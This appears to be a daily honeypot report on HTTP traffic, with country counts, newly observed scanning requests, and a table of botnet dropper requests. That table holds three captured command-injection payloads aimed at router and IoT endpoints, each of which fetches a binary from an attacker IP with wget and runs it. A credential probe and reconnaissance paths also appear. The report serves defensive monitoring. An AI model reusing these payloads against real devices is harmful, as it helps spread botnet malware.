Daily Report: 2025-05-10#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 26 new requests that have never been observed before (these were added to the monitored request database.).
A total of 957 requests were recorded during the day, originating from 3 different countries, with a peak of 171 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
MD | Israel |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
196.251.72.142 | GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/jaws.sh;chmod+777+*;./jaws.sh HTTP/1.1 |
103.48.64.43 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.64.43:42836/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.252.137.107 | target_addr=1.1.1.1%7cecho%20%24(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F103.252.137.107%2Fdwrioej%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips)&wanif=1_INTERNET_R_VID_100 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
152 | 1 | \x04\x01\x01\xBB\x17\xD7\x00\x88admin:password\x00 |
154 | 1 | GET /bJdL HTTP/1.1 |
155 | 1 | GET /dHz7 HTTP/1.1 |
175 | 1 | GET /App/test HTTP/1.1 |
176 | 1 | GET /Admin/test HTTP/1.1 |
177 | 1 | GET /Media/test HTTP/1.1 |
178 | 1 | GET /Vendor/test HTTP/1.1 |
179 | 1 | GET /Server/test HTTP/1.1 |
180 | 1 | GET /Staging/test HTTP/1.1 |
181 | 1 | GET /Twilio/test HTTP/1.1 |
182 | 1 | GET /Crm/test HTTP/1.1 |
183 | 1 | GET /Config/test HTTP/1.1 |
185 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x8F\x85\xC8\xA0ME\x0EA\x05\x02\x00\x01\x00\x00\xA1\xAA |
187 | 1 | GET /config/index?time=1746885677249190742 HTTP/1.1 |
188 | 1 | GET /api/bin/440393?time=1746885939435011026 HTTP/1.1 |
189 | 1 | POST /api/user/binLookup?time=1746885940212541345 HTTP/1.1 |
199 | 1 | GET /index.php?phpinfo HTTP/1.1 |
203 | 1 | GET /phpsysinfo/ HTTP/1.1 |
204 | 1 | GET /phpsysinfo/test HTTP/1.1 |
208 | 1 | GET /test.php?phpinfo HTTP/1.1 |
210 | 1 | GET /system/phpinfo.php HTTP/1.1 |
213 | 1 | GET /showphpinfo.php HTTP/1.1 |
235 | 1 | GET /sI5l HTTP/1.1 |
236 | 1 | GET /JyHQ HTTP/1.1 |
237 | 1 | Get /admin/login.asp HTTP/1.1 |
238 | 1 | POST /boaform/admin/formTracert HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 171 | US |
1 | 153 | NL |
2 | 106 | GB |
3 | 70 | CN |
4 | 62 | CH |
5 | 49 | RU |
6 | 43 | PL |
7 | 40 | DE |
8 | 30 | MD |
9 | 26 | SC |
10 | 25 | UA |
11 | 23 | CA |
12 | 19 | LT |
13 | 19 | KR |
14 | 14 | FR |
15 | 11 | NP |
16 | 10 | GH |
17 | 9 | HR |
18 | 9 | IN |
19 | 8 | JP |
20 | 6 | IL |
21 | 5 | HK |
22 | 5 | VN |
23 | 5 | ZA |
24 | 4 | VE |
25 | 4 | BE |
26 | 4 | SG |
27 | 3 | PT |
28 | 3 | AU |
29 | 3 | AO |
30 | 2 | GE |
31 | 2 | ID |
32 | 2 | ZM |
33 | 2 | AR |
34 | 2 | BR |
35 | 2 | AT |
36 | 1 | EC |
37 | 1 | SA |
38 | 1 | IR |
39 | 1 | TR |
40 | 1 | KH |
41 | 1 | CZ |